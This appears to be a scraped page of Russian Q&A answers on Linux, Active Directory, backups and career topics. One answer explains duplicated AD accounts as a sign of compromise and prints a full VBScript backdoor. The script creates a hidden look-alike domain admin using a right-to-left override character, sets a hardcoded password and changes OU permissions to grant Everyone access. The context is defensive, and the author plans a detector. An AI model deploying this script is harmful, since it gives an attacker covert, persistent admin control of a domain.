• Как удобно просматривать vk.com на Ubuntu?

    nazarpc
    @nazarpc
    Open Source enthusiast
    1) Шрифты стандартные семейства Ubuntu вполне ОК, общепринятые тоже есть в стандартной поставке, а что виндовые будут красиво сглаживаться и отображаться 100% гарантии нет, так как рендеринг шрифтов совсем другой
    2) Включите сглаживание в Unity Tweak Tool по максимуму - это не то кривое поделие, что в Windows, сглаживание и правда работает прекрасно и читать становится приятнее
    3) В настройках vk есть опция увеличения шрифтов, если все элементы интерфейса системы мелкие - в 14.04 если адекватная поддержка дисплеев высокого разрешения - в настройках рабочего стола можете покрутить масштаб в большую сторону.
    Ответ написан
    Комментировать
  • Много процессов CRON в списке, нормально ли это?

    okneigres
    @okneigres
    Переодически падали сервера из-за такой вот проблемы с кронами в статусе D. Гугление по англоязычным ресурсам привело к нахождению вот этого: "I have seen this happen before, it was always associated with a developing disk or disk controller fault. Check your hardware fault logs too."

    В таком состоянии сервак вообще вел себя странно, попытки записать что-то на диск вешают процессы, а потом и всю систему (хотя, чтение отрабатывало). У себя на серваках я обновил ядро до последнего, попутно решились другие странные проблемы. Пока наблюдаю.
    Ответ написан
    Комментировать
  • Как настроить фаервол в Ubuntu?

    kotomyava
    @kotomyava
    Системный администратор
    Проще всего, вероятно, воспользоваться не самим iptables, а надстройкой над iptables, имеющейся в Ubuntu, а именно ufw. Почитать можно например здесь:
    help.ubuntu.ru/wiki/%D1%80%D1%83%D0%BA%D0%BE%D0%B2...

    А вообще, по Ubuntu полно документации, в том числе на русском, так что стоит попользоваться гуглом, и наверняка найдётся именно такой кейс, который вам нужен. А вот потом, если что-то конкретное будет не понятно, уже имеет смысл задать более конкретный вопрос тут.
    Ответ написан
    Комментировать
  • Какое облако выбрать для хранения файлов?

    @inkvizitor68sl
    Linux-сисадмин с 8 летним стажем.
    Зависит от данных. Своё, понятное дело, лучше, если данные вы желаете считать своими, а не дядиными.

    Seafile (опенсорс) или BTsync - для тех случаев, когда вы хотите синхронизироваться с облаком (а-ля Dropbox).
    OwnCloud - больше похож на что-то в духе старой доброй самбы, только по WebDAV. Крутой, но синхронизация паршивая. Ну и вебморда хорошая.

    Есть ещё нечто среднее - AeroFS, все файлы принадлежат вам, на чужие серверы не попадают (пока галку не поставите), но синхронизация инициируется через чужие серверы (файлы же копируются через p2p). В отличии от BTSync работает порезвее.
    Ответ написан
    1 комментарий
  • Как не получить ошибку "missing operation system" при загрезке системы с флешки?

    Gromobanan777
    @Gromobanan777
    Self-employed professional
    Startup disk creator из коробки должен всё записывать нормально (загрузчик bootmgr).
    Юзайте dd:
    #dd bs=4M if=ubuntu-12.04.4-desktop-amd64.iso of=/dev/sdb

    Вместо sdb ваш девайс.
    Ответ написан
    4 комментария
  • Как ограничить вход пользователей на компьютеры в однодоменной сети?

    Slipeer
    @Slipeer
    Не уверен (негде посмотреть - у меня везде однодоменные леса)
    в GPO Конфигурация компьютера\Конфигурация Windows\Параметры безопасности\Локальные политики\Назначение прав пользователя\Локальный вход в систему
    Задаются пользователи и группы которым можно заходить в систему. По-умолчанию там локальные группы.
    Составом локальных групп можно управлять через Group Policy Preferences (на XP требуется установка расширения для поддержки - на Vista и выше поддержка есть)
    Если в каждом домене в локальных пользователях ПК будут только пользователи этого домена - другие не смогут входить.
    Для пользователей из других доменов, которым надо дать доступ - можно в локальные пользователи заранее добавлять какую-нибудь дополнительную группу - надо дать доступ на вход в соседний домен - добавили в группу, надо забрать - удалили.

    Администраторы леса по-умолчанию всегда будут иметь доступ везде - и это лучше не трогать.

    P.S. А вообще, если Вы на стадии проектирования - задумайтесь - так ли Вам необходима многодоменная архитектура?
    Ответ написан
  • Как вы делаете резервное копирование на Linux Ubuntu ?

    Может воспользоваться этой статьей habrahabr.ru/post/136595 ?
    Ответ написан
    Комментировать
  • Как добавить swap-раздел после установки Kubuntu 14.04?

    selivanov_pavel
    @selivanov_pavel
    Linux admin
    Можно просто сделать swap-файл. Отдельный раздел принято использовать исторически, но на современном железе разницы в производительности нет.
    Ответ написан
    3 комментария
  • Ухудшение производительности в linux

    selivanov_pavel
    @selivanov_pavel
    Linux admin
    Linux-сервер, особенно после грамотной настройки, действительно может побить винду и по производительности, и по экономичности. С десктопом всё обстоит с точностью до наоборот. Приложения для разных DE хотят разный набор сервисов в пользовательской сессии, выполняющих одну и ту же роль; очередной новый революционный интерфейс требует кучу ресурсов для рисования полутора кнопок; и т. д. Советую Xubuntu, XFCE достаточно неприхотлив по ресурсам и не требует over 9000 часов работы напильником.

    З.Ы. Что ест процессор? Браузеры или Xorg? Судя по симптомам, вангую использование какого-нибудь nouveau вместо проприетарных NVIDIA драйверов.
    Ответ написан
    Комментировать
  • Как вы делаете резервное копирование на Linux Ubuntu ?

    @Gadd
    В ubuntu (12.04 как минимум) есть встроенная утилита deja-dup. Гуй доступен через "Параметры системы". Можно пользовать и через консоль.
    Поддерживает копирование в папки, в сетевые сервисы и пр.

    Если нужно просто иметь копию папки в бекапе, то можно использовать всё что описано выше. От себя добавлю "синхронизатор" Conduit
    Ответ написан
    Комментировать
  • Почему двоятся учетные записи Active directory?

    @polarnik
    Тестировщик
    Если негативные варианты рассматриваются, то это взлом.
    Вторая учётка имеет имя g_nimdAceTmoC, + первый символ указывает обратное направление текста.
    Такой ход используется, чтобы визуально скрыть наличие в списке контроля доступа нового пользователя.
    Подробнее смотрите в вебинаре
    Тестирование на проникновение в сетях Microsoft (Дмитрий Евтеев, руководитель отдела анализа защищенности, Positive Technologies, 15.03.2012 14:00)
    http://www.ptsecurity.ru/ics/Тестир_на_проникн_в_с... (со слайда 23)
    или
    my.comdi.com/record/46030

    update: 17 января 2015 года.
    Читал Exploit-db и нашел статью Дмитрия Евтеева. Где есть скрипт для создания учётной записи, которая выглядит как двойная.
    www.exploit-db.com/wp-content/themes/exploit/docs/...
    Статья на русском языке:
    devteev.blogspot.ru/2012/01/backdoor-active-direct...

    On Error Resume Next
    strAdminsamAccountName = "dmitry.ivanov"
    strAdminsGroup = "Domain Admins"
    strPassNewUser = "P@ssw0rd"
    
    '---
    
    Dim arrContainer(), i
    
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strDomain = objRootDSE.Get("DefaultNamingContext")
    Set objDomain = GetObject("LDAP://" & strDomain)
    
    strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'")
    
    If Not IsNull(strAdminsamAccountNameDN) Then
            Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
            Set objOU = GetObject(objAdmin.parent)
    
            i=0
            Call EnumOUs(objOU)
            For j = i-1 To 0 Step-1
                    if strContainer="" Then
                            strContainer = "OU=" & arrContainer(j) & strContainer
                            primaryContainer = strContainer
                    Else
                            strContainer = "OU=" & arrContainer(j) & "," & strContainer
                    End if
                    
                    Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
                    objOUcreate.SetInfo
            Next
            
            Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
            Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
            objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
            objUserCreate.SetInfo
            
            On Error Resume Next
            
            objUserCreate.SetPassword strPassNewUser
            objUserCreate.Put "userAccountControl", 66048
            objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
            objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
            objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
            objUserCreate.SetInfo
            
            On Error Resume Next
            
            objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
            objUserCreate.SetInfo
            
            On Error Resume Next
            
            NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
            strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'")
            
            If Not IsNull(strAdminsGroupDN) Then
                    Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
                    objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
                    objGroup.SetInfo
                    objGroup.PutEx 3, "member", Array(NewUserDN)
                    objGroup.SetInfo
            End If
            
            OUAddAce(primaryContainer & "," & strDomain)
    End If
    
    
    Function SearchDN(str)
            Set objConnection = CreateObject("ADODB.Connection")
            
            objConnection.Provider = "ADsDSOObject"
            objConnection.Open "Active Directory Provider"
            
            Set objCommand = CreateObject("ADODB.Command")
            Set objCommand.ActiveConnection = objConnection
            objCommand.Properties("Searchscope") = 2
            
            objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str
            Set objRecordSet = objCommand.Execute
            
            If Not objRecordSet.EOF Then
                    SearchDN = objRecordSet.Fields("distinguishedName").Value
            End if
    End Function
    
    
    Sub EnumOUs(objChild)
            Dim objParent
            Set objParent = GetObject(objChild.Parent)
            
            If (objParent.Class = "organizationalUnit") Then
                    ReDim Preserve arrContainer(i + 1)
                    arrContainer(i) = objChild.ou
                    i=i+1
                    Call EnumOUs(objParent)
            Else
                    ReDim Preserve arrContainer(i + 1)
                    arrContainer(i) = objChild.ou & ChrW(128)
                    i=i+1
            End If
    End Sub
    
    
    Function OUAddAce(OU)
            Dim objSdUtil, objSD, objDACL, objAce
            Set objOU = GetObject ("LDAP://" & OU)
    
            Set objSdUtil = GetObject(objOU.ADsPath)
            Set objSD = objSdUtil.Get("ntSecurityDescriptor")
            Set objDACL = objSD.DiscretionaryACL
            Set objAce = CreateObject("AccessControlEntry")
    
            objAce.Trustee = "Everyone"
            objAce.AceFlags = 2
            objAce.AceType = 6
            objAce.AccessMask = 16
            objAce.Flags = 1
            objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
            objDacl.AddAce objAce
    
            objSD.DiscretionaryAcl = objDacl
            objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
            objSDUtil.SetInfo
            
            Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
            intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
            intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
            objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
            objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
            objOU.SetInfo
    End Function


    Завтра посижу подумаю, на свежую голову. Как написать обратный скрипт. Выявляющий учётные записи с символом ChrW(8238) в наименовании. Думаю, просто такой скрипт сделать. Но для проверки работы такого чекера понадобится тестовый домен, в котором будут созданы "двойные" записи.
    Ответ написан
    1 комментарий
  • Как побороть боязнь чистого листа?

    Sterhel
    @Sterhel
    Перфекционизм, доведенный до фанатизма, неплохо так сковывает.

    Идите и делайте.

    Лучше потом смотреть на результат труда вида "Средненькое ничего, надо доработать", чем на "У меня просто идеальное нихрена".
    Ответ написан
    Комментировать
  • Как побороть боязнь чистого листа?

    Meehalkoff
    @Meehalkoff
    Просто перестань придумывать отговорки и начни уже делать то, что нравится. Соберись, тряпка! Жизнь слишком коротка, чтобы тратить ее на свои страхи и комплексы ;)
    Ответ написан
    Комментировать
  • VMware vSphere ESX 4.0 - какие технические характеристики?

    oia
    @oia
    на втором конфиге будет работать , но надо брать уже версию 5.5 ап1 , ну может быть трабла с работой сети не любит VMware реалтеки )
    Ответ написан
    2 комментария
  • Может ли ВУЗ наказать за написание курсовых студентам?

    aen
    @aen
    Keep calm and 'use strict';
    Вы оказываете информационные услуги студентам. Если ВУЗ и накажет кого-то, то только студента, но ВУЗу на это глубоко плевать. Оформите ИП, ведите бухгалтерию, платите налоги и будете считаться малым бизнесом.
    Ответ написан
    Комментировать
  • Может ли ВУЗ наказать за написание курсовых студентам?

    Spetros
    @Spetros
    IT-шник
    А вы этому ВУЗу кем приходитесь?
    В принципе, вас можно прищучить точно также, как и Аль Капоне - за неуплату налогов.
    Ответ написан
    Комментировать
  • Как вы распоряжаетесь своими пенсионными накоплениями?

    Slipeer
    @Slipeer
    Оставили в ПФР почему?

    Потому что не верю, что доживу до пенсии…
    Ответ написан
    2 комментария